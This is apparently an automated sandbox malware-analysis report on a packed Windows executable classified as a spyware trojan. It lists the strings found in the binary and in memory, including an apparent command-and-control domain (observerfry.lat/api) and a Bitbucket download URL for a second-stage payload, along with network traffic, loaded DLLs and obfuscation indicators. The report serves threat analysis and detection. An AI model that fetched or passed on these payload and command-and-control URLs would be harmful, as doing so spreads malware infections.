                Source: tTGxYWtjG5.exe, 00000001.00000003.1618956138.0000000000888000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1619213944.000000000088D000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1618956138.0000000000859000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1619162344.0000000000864000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aui-cdn.atlassian.com/
                Source: tTGxYWtjG5.exeString found in binary or memory: https://bbc-frontbucket-canary.pro
                Source: tTGxYWtjG5.exe, 00000001.00000003.1619162344.0000000000864000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000002.1910955173.0000000000888000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
                Source: tTGxYWtjG5.exe, 00000001.00000003.1619162344.0000000000864000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000002.1910955173.0000000000888000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net
                Source: tTGxYWtjG5.exe, 00000001.00000003.1619162344.0000000000864000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000002.1910955173.0000000000888000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
                Source: tTGxYWtjG5.exe, 00000001.00000003.1619162344.0000000000864000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000002.1910955173.0000000000888000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
                Source: tTGxYWtjG5.exe, 00000001.00000002.1910955173.0000000000888000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1
                Source: tTGxYWtjG5.exeString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.pu
                Source: tTGxYWtjG5.exe, 00000001.00000002.1910955173.0000000000888000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
                Source: tTGxYWtjG5.exe, 00000001.00000003.1619162344.0000000000864000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000002.1910955173.0000000000888000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;
                Source: tTGxYWtjG5.exeString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.
                Source: tTGxYWtjG5.exe, 00000001.00000003.1619162344.0000000000864000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000002.1910955173.0000000000888000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/
                Source: tTGxYWtjG5.exe, 00000001.00000002.1910553330.00000000007D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/
                Source: tTGxYWtjG5.exe, 00000001.00000002.1915451922.00000000054AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-
                Source: tTGxYWtjG5.exe, 00000001.00000002.1910553330.00000000007FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com:443
                Source: tTGxYWtjG5.exe, tTGxYWtjG5.exe, 00000001.00000003.1618956138.0000000000859000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com:443/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3
                Source: tTGxYWtjG5.exeString found in binary or memory: https://bitbucket.org/
                Source: tTGxYWtjG5.exe, 00000001.00000002.1910553330.000000000081E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe
                Source: tTGxYWtjG5.exe, 00000001.00000002.1910553330.00000000007E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe#CJ
                Source: tTGxYWtjG5.exe, 00000001.00000002.1910462653.000000000073A000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe.0
                Source: tTGxYWtjG5.exe, 00000001.00000002.1910955173.0000000000866000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1618956138.0000000000859000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1619162344.0000000000864000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/zK
                Source: tTGxYWtjG5.exe, 00000001.00000002.1910553330.00000000007FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org:443/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe
                Source: tTGxYWtjG5.exe, 00000001.00000003.1408319971.000000000088A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
                Source: tTGxYWtjG5.exe, 00000001.00000003.1408319971.000000000088A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta
                Source: tTGxYWtjG5.exe, tTGxYWtjG5.exe, 00000001.00000003.1618956138.0000000000888000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1619213944.000000000088D000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1618956138.0000000000859000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1619162344.0000000000864000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.cookielaw.org/
                Source: tTGxYWtjG5.exe, 00000001.00000003.1358978816.00000000054EC000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1358348490.00000000054EF000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1358548781.00000000054EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: tTGxYWtjG5.exe, 00000001.00000003.1358978816.00000000054EC000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1358348490.00000000054EF000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1358548781.00000000054EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: tTGxYWtjG5.exe, 00000001.00000003.1358978816.00000000054EC000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1358348490.00000000054EF000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1358548781.00000000054EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: tTGxYWtjG5.exe, 00000001.00000003.1408319971.000000000088A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
                Source: tTGxYWtjG5.exe, 00000001.00000003.1408319971.000000000088A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: tTGxYWtjG5.exe, 00000001.00000003.1358978816.00000000054EC000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1358348490.00000000054EF000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1358548781.00000000054EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: tTGxYWtjG5.exe, 00000001.00000003.1358978816.00000000054EC000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1358348490.00000000054EF000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1358548781.00000000054EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: tTGxYWtjG5.exe, 00000001.00000003.1358978816.00000000054EC000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1358348490.00000000054EF000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1358548781.00000000054EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: tTGxYWtjG5.exe, tTGxYWtjG5.exe, 00000001.00000003.1618956138.0000000000888000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1619213944.000000000088D000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1618956138.0000000000859000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1619162344.0000000000864000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
                Source: tTGxYWtjG5.exe, 00000001.00000003.1408319971.000000000088A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
                Source: tTGxYWtjG5.exe, 00000001.00000002.1910553330.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1487811612.0000000000877000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/
                Source: tTGxYWtjG5.exe, 00000001.00000003.1357410577.000000000081E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/(
                Source: tTGxYWtjG5.exe, 00000001.00000003.1436694130.00000000007EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/J
                Source: tTGxYWtjG5.exe, 00000001.00000003.1487811612.0000000000877000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/Yec
                Source: tTGxYWtjG5.exe, tTGxYWtjG5.exe, 00000001.00000003.1357410577.000000000081E000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000002.1910955173.0000000000866000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1474250511.00000000054AD000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1432666855.00000000054B1000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1474406524.00000000007FF000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1406384434.00000000054AE000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000002.1910553330.000000000081E000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1618956138.0000000000859000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1436316095.00000000007FE000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1619162344.0000000000864000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1406504023.00000000054B0000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1357410577.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1432032954.00000000054A5000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1406661276.00000000054B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/api
                Source: tTGxYWtjG5.exe, 00000001.00000002.1910955173.0000000000866000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1618956138.0000000000859000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1619162344.0000000000864000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/apiER
                Source: tTGxYWtjG5.exe, 00000001.00000002.1910553330.000000000081E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/apij
                Source: tTGxYWtjG5.exe, 00000001.00000003.1474250511.00000000054AD000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1432666855.00000000054B1000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1432032954.00000000054A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/apim
                Source: tTGxYWtjG5.exe, 00000001.00000003.1406384434.00000000054AE000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1406504023.00000000054B0000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1406661276.00000000054B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/apiy
                Source: tTGxYWtjG5.exe, 00000001.00000003.1357410577.000000000081E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/pi
                Source: tTGxYWtjG5.exe, 00000001.00000003.1474101580.0000000000877000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/s
                Source: tTGxYWtjG5.exe, 00000001.00000003.1357410577.00000000007FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/v
                Source: tTGxYWtjG5.exe, 00000001.00000003.1487811612.000000000088E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat:443/apiocal
                Source: tTGxYWtjG5.exeString found in binary or memory: https://remote-app-switcher.prod-
                Source: tTGxYWtjG5.exe, 00000001.00000003.1619162344.0000000000864000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000002.1910955173.0000000000888000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
                Source: tTGxYWtjG5.exeString found in binary or memory: https://remote-app-switcher.stg-east.frontend
                Source: tTGxYWtjG5.exe, 00000001.00000003.1619162344.0000000000864000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000002.1910955173.0000000000888000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
                Source: tTGxYWtjG5.exe, 00000001.00000003.1408016793.00000000055CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: tTGxYWtjG5.exe, 00000001.00000003.1408016793.00000000055CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: tTGxYWtjG5.exe, tTGxYWtjG5.exe, 00000001.00000003.1618956138.0000000000888000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1619213944.000000000088D000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1618956138.0000000000859000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1619162344.0000000000864000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
                Source: tTGxYWtjG5.exe, 00000001.00000003.1408319971.000000000088A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0
                Source: tTGxYWtjG5.exe, 00000001.00000003.1358978816.00000000054EC000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1358348490.00000000054EF000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1358548781.00000000054EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: tTGxYWtjG5.exe, 00000001.00000002.1915451922.00000000054AE000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1618956138.0000000000859000.00000004.00000020.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1619233681.00000000054AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
                Source: tTGxYWtjG5.exe, 00000001.00000003.1358978816.00000000054EC000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1358348490.00000000054EF000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1358548781.00000000054EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: tTGxYWtjG5.exe, 00000001.00000003.1408319971.000000000088A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
                Source: tTGxYWtjG5.exe, 00000001.00000003.1408016793.00000000055CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
                Source: tTGxYWtjG5.exe, 00000001.00000003.1408016793.00000000055CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
                Source: tTGxYWtjG5.exe, 00000001.00000003.1408016793.00000000055CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
                Source: tTGxYWtjG5.exe, 00000001.00000003.1408016793.00000000055CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: tTGxYWtjG5.exe, 00000001.00000003.1408016793.00000000055CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
                Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
                Source: unknownHTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.7:49700 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.7:49701 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.7:49703 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.7:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.7:49715 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.7:49721 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.7:49735 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.7:49746 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.7:49752 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 16.15.177.52:443 -> 192.168.2.7:49758 version: TLS 1.2

                System Summary

                barindex
                Source: tTGxYWtjG5.exeStatic PE information: section name:
                Source: tTGxYWtjG5.exeStatic PE information: section name: .rsrc
                Source: tTGxYWtjG5.exeStatic PE information: section name: .idata
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 424 -s 1840
                Source: tTGxYWtjG5.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: tTGxYWtjG5.exeStatic PE information: Section: ZLIB complexity 0.9995404411764706
                Source: tTGxYWtjG5.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@2/5@3/3
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess424
                Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\fc99ead1-797b-4607-9934-8452d20ee8c0Jump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: tTGxYWtjG5.exe, 00000001.00000003.1360544691.00000000054BD000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1384137725.00000000054CD000.00000004.00000800.00020000.00000000.sdmp, tTGxYWtjG5.exe, 00000001.00000003.1359616936.00000000054DA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: tTGxYWtjG5.exeReversingLabs: Detection: 68%
                Source: tTGxYWtjG5.exeVirustotal: Detection: 51%
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeFile read: C:\Users\user\Desktop\tTGxYWtjG5.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\tTGxYWtjG5.exe "C:\Users\user\Desktop\tTGxYWtjG5.exe"
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 424 -s 1840
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: tTGxYWtjG5.exeStatic file information: File size 2963968 > 1048576
                Source: tTGxYWtjG5.exeStatic PE information: Raw size of zwpmlftu is bigger than: 0x100000 < 0x2a9e00

                Data Obfuscation

                barindex
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeUnpacked PE file: 1.2.tTGxYWtjG5.exe.9c0000.0.unpack :EW;.rsrc :W;.idata :W;zwpmlftu:EW;dupzvwvc:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;zwpmlftu:EW;dupzvwvc:EW;.taggant:EW;
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: tTGxYWtjG5.exeStatic PE information: real checksum: 0x2da55a should be: 0x2e3124
                Source: tTGxYWtjG5.exeStatic PE information: section name:
                Source: tTGxYWtjG5.exeStatic PE information: section name: .rsrc
                Source: tTGxYWtjG5.exeStatic PE information: section name: .idata
                Source: tTGxYWtjG5.exeStatic PE information: section name: zwpmlftu
                Source: tTGxYWtjG5.exeStatic PE information: section name: dupzvwvc
                Source: tTGxYWtjG5.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeCode function: 1_3_008660E8 pushad ; ret 1_3_008660F9
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeCode function: 1_3_008660E8 pushad ; ret 1_3_008660F9
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeCode function: 1_3_008660E8 pushad ; ret 1_3_008660F9
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeCode function: 1_3_008660E8 pushad ; ret 1_3_008660F9
